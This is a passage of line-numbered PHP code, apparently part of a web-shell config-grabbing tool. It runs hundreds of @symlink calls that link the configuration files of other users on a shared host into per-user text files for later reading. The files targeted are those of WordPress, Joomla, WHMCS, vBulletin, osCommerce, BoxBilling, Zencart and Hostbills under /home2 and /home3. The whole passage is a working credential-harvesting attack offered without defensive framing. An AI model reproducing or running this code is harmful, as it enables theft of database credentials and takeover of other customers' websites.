  1628. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1629. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1630. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1631. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1632. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1633. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1634. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1635. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1636. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1642. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1643. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1644. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1645. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1646. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1647. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1648. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1649. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1650. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1651. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1652. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1653. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1654. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1655. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1657. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1658. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1659. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1660. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1661. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1662. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1663. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1664. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1665. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1666. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1667. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1668. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1669. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1768. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1769. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1770. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1771. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1772. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1773. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1774. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1775. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1776. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1777. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1778. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1779. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1780. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1781. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1782. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1783. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1784. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1785. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1790. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1791. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1792. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1793. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1794. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1795. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1796. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1797. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1798. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1799. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1800. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1801. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1802. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1803.  
  1804. //Home3
  1805.  
  1806. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1807. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1808. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1809. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1810. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1811. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1812. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1813. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1814. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1815. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1816. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1817. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1818. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1819. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1825. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1826. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1827. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1828. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1829. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1830. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1831. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1832. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1833. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1834. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1835. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1836. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1837. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1838. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1840. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1841. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1842. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1843. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1844. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1845. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1846. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1847. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1848. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1849. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1850. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1851. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1852. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1896. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1902. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1911. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
